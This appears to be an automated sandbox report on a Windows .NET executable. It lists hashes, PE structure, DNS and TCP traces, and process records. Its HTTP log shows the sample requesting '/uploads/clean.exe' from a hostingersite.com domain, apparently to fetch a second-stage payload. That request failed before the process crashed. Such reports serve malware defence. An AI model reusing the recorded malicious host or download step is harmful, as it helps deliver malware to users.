                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Entropy (8bit):5.581328681783163
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                • Win32 Executable (generic) a (10002005/4) 49.75%
                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                • Windows Screen Saver (13104/52) 0.07%
                • Win16/32 Executable Delphi generic (2074/23) 0.01%
                File name:iGxCM2I5u9.exe
                File size:288'768 bytes
                MD5:8c6fb38b219a123b9340465b8d2dd5f8
                SHA1:35242280f551684b9e47726d5f94f1615c0dc76e
                SHA256:2960e7ad1d18bf517b5b4edf6e674e5ffdc587a8672cac0b24907a8fae8de59c
                SHA512:dd33b0934cfb262862b388b843c2ff13637c0cc1b75b7e7a8cb1640a3d39066e9681137b6ff68545eeb9a0850f23c24b470963520852f51d8644cd9de74768dd
                SSDEEP:6144:VvzIeMWcsLDGfFYiudGV0LkB/dQs7XJBCIX8boS7ZS/5iEl:V7xH5upVB+4XJBCIXc7O5i
                TLSH:4E542B3BABE54805F1EE9A7DCD9E1B62CB65D1022805B353BA436166AD01FFCEC0B0D5
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}............."...0..^...........}... ........@.. ....................................`................................
                Icon Hash:00928e8e8686b000
                Entrypoint:0x447dce
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Time Stamp:0x9A13B17D [Thu Nov 30 18:31:25 2051 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                Instruction
                jmp dword ptr [00402000h]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x47d740x57.text
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x480000x5ae.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x4a0000xc.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x20000x45dd40x45e0027daab8f368ecf41af2b6118b0468c64False0.4570557077370304data5.595000262158807IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rsrc0x480000x5ae0x6008868a3744e55c20cd447f55a71c0cfe6False0.423828125data4.075422995246891IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x4a0000xc0x200e9e66b5e7836ecf366f34ef7d9162967False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                NameRVASizeTypeLanguageCountryZLIB Complexity
                RT_VERSION0x480a00x324data0.43407960199004975
                RT_MANIFEST0x483c40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                DLLImport
                mscoree.dll_CorExeMain
                TimestampSource PortDest PortSource IPDest IP
                Dec 5, 2024 13:04:57.781564951 CET49704443192.168.2.584.32.84.122
                Dec 5, 2024 13:04:57.781609058 CET4434970484.32.84.122192.168.2.5
                Dec 5, 2024 13:04:57.781740904 CET49704443192.168.2.584.32.84.122
                Dec 5, 2024 13:04:57.824556112 CET49704443192.168.2.584.32.84.122
                Dec 5, 2024 13:04:57.824577093 CET4434970484.32.84.122192.168.2.5
                Dec 5, 2024 13:04:59.054481030 CET4434970484.32.84.122192.168.2.5
                Dec 5, 2024 13:04:59.054599047 CET49704443192.168.2.584.32.84.122
                Dec 5, 2024 13:04:59.059197903 CET49704443192.168.2.584.32.84.122
                Dec 5, 2024 13:04:59.059209108 CET4434970484.32.84.122192.168.2.5
                Dec 5, 2024 13:04:59.059469938 CET4434970484.32.84.122192.168.2.5
                Dec 5, 2024 13:04:59.114836931 CET49704443192.168.2.584.32.84.122
                Dec 5, 2024 13:04:59.157887936 CET49704443192.168.2.584.32.84.122
                Dec 5, 2024 13:04:59.199341059 CET4434970484.32.84.122192.168.2.5
                Dec 5, 2024 13:04:59.495481014 CET4434970484.32.84.122192.168.2.5
                Dec 5, 2024 13:04:59.499412060 CET4434970484.32.84.122192.168.2.5
                Dec 5, 2024 13:04:59.499479055 CET49704443192.168.2.584.32.84.122
                Dec 5, 2024 13:04:59.499496937 CET4434970484.32.84.122192.168.2.5
                Dec 5, 2024 13:04:59.499511003 CET4434970484.32.84.122192.168.2.5
                Dec 5, 2024 13:04:59.499563932 CET49704443192.168.2.584.32.84.122
                Dec 5, 2024 13:04:59.524352074 CET49704443192.168.2.584.32.84.122
                TimestampSource PortDest PortSource IPDest IP
                Dec 5, 2024 13:04:57.341284990 CET5335753192.168.2.51.1.1.1
                Dec 5, 2024 13:04:57.773869991 CET53533571.1.1.1192.168.2.5
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Dec 5, 2024 13:04:57.341284990 CET192.168.2.51.1.1.10x5e7eStandard query (0)orange-loris-425181.hostingersite.comA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Dec 5, 2024 13:04:57.773869991 CET1.1.1.1192.168.2.50x5e7eNo error (0)orange-loris-425181.hostingersite.comfree.cdn.hstgr.netCNAME (Canonical name)IN (0x0001)false
                Dec 5, 2024 13:04:57.773869991 CET1.1.1.1192.168.2.50x5e7eNo error (0)free.cdn.hstgr.net84.32.84.122A (IP address)IN (0x0001)false
                • orange-loris-425181.hostingersite.com
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.54970484.32.84.1224436420C:\Users\user\Desktop\iGxCM2I5u9.exe
                TimestampBytes transferredDirectionData
                2024-12-05 12:04:59 UTC104OUTGET /uploads/clean.exe HTTP/1.1
                Host: orange-loris-425181.hostingersite.com
                Connection: Keep-Alive
                2024-12-05 12:04:59 UTC392INHTTP/1.1 404 Not Found
                Date: Thu, 05 Dec 2024 12:04:59 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                last-modified: Wed, 11 Jan 2023 12:29:40 GMT
                etag: W/"999-63beabb4-5b41a25ab194c3b4;gz"
                platform: hostinger
                panel: hpanel
                x-turbo-charged-by: LiteSpeed
                Server: hcdn
                x-hcdn-request-id: 141d270770133aca7f524af2d72e23ad-bos-edge1
                2024-12-05 12:04:59 UTC977INData Raw: 39 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e
                Data Ascii: 999<!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/n
                2024-12-05 12:04:59 UTC1369INData Raw: 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6f 70 73 2c 20 73 6f 6d 65 74 68 69 6e 67 20 6c 6f 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 74 68 65 20 70 61 67 65 20 69 73 20 6c 6f 73 74 2e 20 53 74 61 72 74 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 6f 6e 20 74 68 65 20 63 68 65 61 70 2e 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 6d 65 64 69 61 3d 22 61 6c 6c
                Data Ascii: nt="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks like the page is lost. Start your website on the cheap."> <link media="all
                2024-12-05 12:04:59 UTC123INData Raw: 20 6e 6f 74 20 61 20 66 61 75 6c 74 2c 20 6a 75 73 74 20 61 6e 20 61 63 63 69 64 65 6e 74 20 74 68 61 74 20 77 61 73 20 6e 6f 74 20 69 6e 74 65 6e 74 69 6f 6e 61 6c 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                Data Ascii: not a fault, just an accident that was not intentional.</p> </div> </div></body></html>0


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:07:04:55
                Start date:05/12/2024
                Path:C:\Users\user\Desktop\iGxCM2I5u9.exe
                Wow64 process (32bit):false
                Commandline:"C:\Users\user\Desktop\iGxCM2I5u9.exe"
                Imagebase:0x1ec7ce90000
                File size:288'768 bytes
                MD5 hash:8C6FB38B219A123B9340465B8D2DD5F8
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                Target ID:4
                Start time:07:04:59
                Start date:05/12/2024
                Path:C:\Windows\System32\WerFault.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\WerFault.exe -u -p 6420 -s 2096
                Imagebase:0x7ff67d450000
                File size:570'736 bytes
                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Reset < >
                  Memory Dump Source
                  • Source File: 00000000.00000002.2315210761.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f40000_iGxCM2I5u9.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cafb45c465b50d726e90818475cc393f5a359da64447af755e31dcd330cad32d
                  • Instruction ID: e656dc2fac4cace4f1af8a09b08ea8e802645bbb25825acd5bfd63e47a4cf2e1
                  • Opcode Fuzzy Hash: cafb45c465b50d726e90818475cc393f5a359da64447af755e31dcd330cad32d
                  • Instruction Fuzzy Hash: C5F1A23091CA8D8FEBA8EF28CC557E977D1FF64350F04426AD84DC7296DB3899458B81
                  Memory Dump Source
                  • Source File: 00000000.00000002.2315210761.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f40000_iGxCM2I5u9.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fd8a603ac51a8ba28f271a013813bfcea24947a3da341acd90ac83679e6462db
                  • Instruction ID: 5a477dde2fdf7c6ceb0e97b427e1e3872b816bd531a7fbf4f3b87a465c5c8982
                  • Opcode Fuzzy Hash: fd8a603ac51a8ba28f271a013813bfcea24947a3da341acd90ac83679e6462db
                  • Instruction Fuzzy Hash: C6E1903090CA8E8FEBA8EF28C8557F977D1FF64750F04426AD84DC7291DB78A9448B81
                  Memory Dump Source
                  • Source File: 00000000.00000002.2315210761.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f40000_iGxCM2I5u9.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d2a61c364f587cfea476c4e0917eb1347989a935cb7eb9d2689fc5bfe5cb62e2
                  • Instruction ID: 28765166e3f861d4aca2c1ebdabd9035940b65bfea0f9366f2ddc2e1611c50f0
                  • Opcode Fuzzy Hash: d2a61c364f587cfea476c4e0917eb1347989a935cb7eb9d2689fc5bfe5cb62e2
                  • Instruction Fuzzy Hash: 00516031919A1C8FDB54EB58D845BE9BBF1FB59310F0082ABD44DE3252DF34A9858F81
                  Memory Dump Source
                  • Source File: 00000000.00000002.2315210761.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f40000_iGxCM2I5u9.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 85afbf19c70afa71a4bfa58c1b4be02b86e4cbda7aec291253be8abcd228b485
                  • Instruction ID: 2a34308fe51268f527cb5194eedabe66c62ea11c1df99a876f2df4f0aeff3bef
                  • Opcode Fuzzy Hash: 85afbf19c70afa71a4bfa58c1b4be02b86e4cbda7aec291253be8abcd228b485
                  • Instruction Fuzzy Hash: 2A517C3184E7C54FE743ABB888654997FB0EF27660B4901EBC085CB5A3D65D184AC722
                  Memory Dump Source
                  • Source File: 00000000.00000002.2315210761.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f40000_iGxCM2I5u9.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f1c771fe43a3bbe2a83dfdc6c9cae0f013e2ac6e62e443b4b54684be1bf02546
                  • Instruction ID: d86bf87beee8cc510335e0fc5ffcee523c6bbc16f0970dca5348d805eb69351d
                  • Opcode Fuzzy Hash: f1c771fe43a3bbe2a83dfdc6c9cae0f013e2ac6e62e443b4b54684be1bf02546
                  • Instruction Fuzzy Hash: E7411230A1DA460FE355B7B8885A2B97AD2EF59B94F9501BEC00ED76D3DE2D7C028305
                  Memory Dump Source
                  • Source File: 00000000.00000002.2315210761.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f40000_iGxCM2I5u9.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7c02de0060c57ebdbdb7ac692a22ab7bc72383a61988caf3e9965ba488aac57e
                  • Instruction ID: 2ba8675da4982a6cb9716e5081f9cb8b657c9c3c676bd07dda4607b2ff614b98
                  • Opcode Fuzzy Hash: 7c02de0060c57ebdbdb7ac692a22ab7bc72383a61988caf3e9965ba488aac57e
                  • Instruction Fuzzy Hash: E1316D31B1DD0D4FEB99FB6C94551BCB7D2EFA8A51B4001BAE00ED72D2EF29AC018644
                  Memory Dump Source
                  • Source File: 00000000.00000002.2315210761.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f40000_iGxCM2I5u9.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9438a52bbf063c2e946b4bc65d409eb0b340bd3104e332059d9c3d7f4891fd87
                  • Instruction ID: 1ec9eb93f5326055360d4bf5d31ee9a5b2b8d87c9b2e5c1511ddb45caa4a5f17
                  • Opcode Fuzzy Hash: 9438a52bbf063c2e946b4bc65d409eb0b340bd3104e332059d9c3d7f4891fd87
                  • Instruction Fuzzy Hash: 05F0F67080E7C96FC313EBB48C6949A3FF5DE536A074601EBE045CBAA2E51C4C05C752
                  Memory Dump Source
                  • Source File: 00000000.00000002.2315210761.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f40000_iGxCM2I5u9.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6a48acc678a69f5d4e06615047a5a27977a35186523f335287acc200a1bc2641
                  • Instruction ID: 7513b5515ee9c93b4f30d1cc2253afc143a186cf9e1c2c6259a31c0c925b1461
                  • Opcode Fuzzy Hash: 6a48acc678a69f5d4e06615047a5a27977a35186523f335287acc200a1bc2641
                  • Instruction Fuzzy Hash: 91F0B43071D90A5FE680F7ACD8417B973C1DF546A0F80047AE40DC36D5EE5DA8428341
                  Memory Dump Source
                  • Source File: 00000000.00000002.2315210761.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f40000_iGxCM2I5u9.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0b3140873859e0126ca202ea1dc7a3fe07648903cdf1e5f7377a2cab326f5f42
                  • Instruction ID: 4df641d59b08f5f8f8c4c4d1f1f441ace15424ec86590a7f12d1e91295c86f8a
                  • Opcode Fuzzy Hash: 0b3140873859e0126ca202ea1dc7a3fe07648903cdf1e5f7377a2cab326f5f42
                  • Instruction Fuzzy Hash: 45E0EC20B1BA492FD785FBAC54956AC6BD2DF58690F50047A900DD7692DE2C68418705
                  Memory Dump Source
                  • Source File: 00000000.00000002.2315210761.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f40000_iGxCM2I5u9.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 83ef109420d42dfa5caea97c09ab0980e6548adb04bbbb0eb26d547bc0d983fa
                  • Instruction ID: 03e51a047bfbb9c3cbae6fcfd4253e74703d69dd8e9c2b2548330be60f801511
                  • Opcode Fuzzy Hash: 83ef109420d42dfa5caea97c09ab0980e6548adb04bbbb0eb26d547bc0d983fa
                  • Instruction Fuzzy Hash: 1DD097B087F50A0FCA0ABBFA4C022907792DF12090FC480B8C88583AE2E30F0C4B43C1
                  Memory Dump Source
                  • Source File: 00000000.00000002.2315210761.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f40000_iGxCM2I5u9.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b9105b7bd5071a736ccb6d4dbec45c9db5f0d634b36933cae1adff0067da0591
                  • Instruction ID: 635798bc686bad019028f8e3f9ca04029e00c3ccdf2206baf437b4cb79ab7786
                  • Opcode Fuzzy Hash: b9105b7bd5071a736ccb6d4dbec45c9db5f0d634b36933cae1adff0067da0591
                  • Instruction Fuzzy Hash: